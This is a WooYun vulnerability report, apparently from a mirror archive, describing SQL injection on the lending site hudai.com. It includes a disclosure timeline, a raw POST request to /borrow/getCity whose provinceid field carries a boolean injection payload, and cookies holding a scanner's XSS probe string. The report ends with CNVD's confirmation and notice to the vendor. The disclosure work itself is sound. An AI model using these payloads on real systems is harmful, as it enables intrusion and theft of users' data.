乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-06: 细节已通知厂商并且等待厂商处理中 2015-08-10: 厂商已经确认,细节仅向厂商公开 2015-08-20: 细节向核心白帽子及相关领域专家公开 2015-08-30: 细节向普通白帽子公开 2015-09-09: 细节向实习白帽子公开 2015-09-24: 细节向公众公开
网站存在sql注入,大量用户信息、手机信息遭到泄漏,管理员信息泄漏
sqlmap读包psot测试:
POST /borrow/getCity HTTP/1.1Content-Length: 48Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.hudai.com/Cookie: tc=AQAAAFzLdUn9fQAAmm8N0rn7R5LFCUuX; PHPSESSID=q7acq3vrv1r2ter178srjfgfv1; HUDAI_VISITOR=f0a9ad2c1d4c6eb0b26b9561ae97c396; userCheckTime=1438668536; _visitid=55c04fed44112; Hm_lvt_67ac57173ff1e28d2240afc0d4134f16=1438667464,1438667497,1438667498,1438667522; Hm_lpvt_67ac57173ff1e28d2240afc0d4134f16=1438667522; _last_visit_time_6b2ff18fccf8ef8698e7e0170f91f6ee=1438667143000; _last_visit_time_f9f7728076bcb1a00fb96b1a0987622d=1438667143000; _last_visit_time_dddb23b3ef92a29d62a58c0851bda719=1438667143000; _last_visit_time_11b16e2a11e0f098abd493851e927a4e=1438667143000; _last_visit_time_3100b311da25efe2212be4c4a6a4e388=1438667143000; tempid=125596; type=0; looyu_id=b8cddca6ed8109ac02748486ffc796d479_20000449%3A1; looyu_20000449=v%3Ab8cddca6ed8109ac02748486ffc796d479%2Cref%3Ahttp%253A//www.acunetix-referrer.com/javascript%253AdomxssExecutionSink%25280%252C%2522%2527%255C%2522%253E%253Cxsstag%253E%2528%2529refdxss%2522%2529%2Cr%3A%2Cmon%3Ahttp%3A//m8103.looyu.com/monitor%2Cp0%3Ahttp%253A//www.hudai.com/loan/loan; _alicdn_sec=55c0519fdd7972f19b32c9a9f9c45ada83b35f9a; HMACCOUNT=DDF25657E00D70EC; _last_visit_time_db9ee38e87b85c0819a1ab08a26d58bb=1438667183000; _last_visit_time_6b6d04de9ea2aa77ed165c6e5f5a0ced=1438667184000; _last_visit_time_11503193a2aa8db001e1490b14541500=1438667208000; __t99_20000449="_u:b8cddca6ed8109ac02748486ffc796d479,_v:b8cddca6ed8109ac02748486ffc796d479,_site:0,_ct:1,_ref:http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29,_p0:http%3A%2F%2Fwww.hudai.com%2Floan%2Floan,_r:"; _last_visit_time_7373af264f170a57301b11965f834254=1438667235000; _last_visit_time_c7276b1f99586e08d15ee18813a9861a=1438667236000; _last_visit_time_4bd23435eeec57249f85e2c55baf6c7a=1438667238000; _last_visit_time_630f20936e4c6623d174e552182d013b=1438667248000; _last_visit_time_2c7af8127f0a08135a039f0f4a6aea8a=1438667256000; _last_visit_time_6b5dc2e5e82f48e8a63eeea77352f220=1438667262000; _last_visit_time_6505f56bf1f79cec3aa41d0e3dda824d=1438667268000; _last_visit_time_882898a61b2be9aa0656acfe1c142011=1438667281000; _last_visit_time_376932267803f24ee70bb3d3db8af256=1438667285000; _last_visit_time_e6415e538946773660e7f53470ee5d66=1438667301000; _last_visit_time_a9e567462283f46b96882efee79a1882=1438667308000; _last_visit_time_cd782cfada5883132e1f44ffff401f7f=1438667318000; _last_visit_time_61277501ea1116c707ec148fc71b550e=1438667323000; _last_visit_time_01b08203032e7f27c6590e4d28d74c8b=1438667335000; _last_visit_time_aac840e697bec5b32660e05ada0582a4=1438667336000; _last_visit_time_a8801dd29656ecb574951312c1c00a37=1438667360000; _last_visit_time_ae5437ccbccb6ac5e0144346716274a3=1438667366000; _last_visit_time_6456861f1a0be72ba252dd303fdf8315=1438667454000; _last_visit_time_446f1fd63d5f81b2bb77a3f674dacec0=1438667467000; _last_visit_time_0e6437f9cb821cc3d62f211c5a3ab0c9=1438667470000; BAIDUID=E7F07168D5510DF0E8741451203EEF0B:FG=1; v="2015080413520300080412700153777411|favorite:clipboard:email"; opxPID=2015080413520300080412700153777411; u=1438667523804|1438667523804|1438667523804|1438667523804|1438667523804|1438667523804|1438667523804|1438667523804|1438667523804|1438667523804|1438667523804|1438667523804|1438667523804|; JSESSIONID=707F1E51529A6DF8C75E2D4D8569A5E2; _last_visit_time_5de416ce9cef64ae3843fa0b62a9f684=1438667625000; _last_visit_time_f334c8d2e2a7b1145738396e02ca2e26=1438667626000; _last_visit_time_b1cb656bc97cf228f9369c2d61214584=1438667627000; _last_visit_time_731e5ee23e438fa16448654ad5b2040e=1438667632000; _last_visit_time_8a1f523aa40dda1c81be2b8341b7fd79=1438667633000; _last_visit_time_70b584525c55de0e88be98f83f594df5=1438667772000; _last_visit_time_cf1cb8b01eb1aa525ddd77a4b3821b57=1438667774000; _last_visit_time_6a8c3c292405e9604b4201628b382a0c=1438667776000; _last_visit_time_2135a7a5e5373b785822abc09f5aab89=1438667876000; _last_visit_time_a6495592356b94e88ac36e2211add440=1438667904000; _last_visit_time_210d77f46e8dd6b487b3d8fa31a10ca0=1438667931000; _last_visit_time_d60c8d81045aef1b64cc7eeabaa1d033=1438667983000; _last_visit_time_5a8054d44b31b91a34723c58775b9abc=1438668002000Host: www.hudai.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*provinceid=3%20AND%203*2*1%3d6%20AND%20511%3d511
数据库信息:
管理员信息:
用户信息:
过滤
危害等级:高
漏洞Rank:12
确认时间:2015-08-10 14:46
CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。
暂无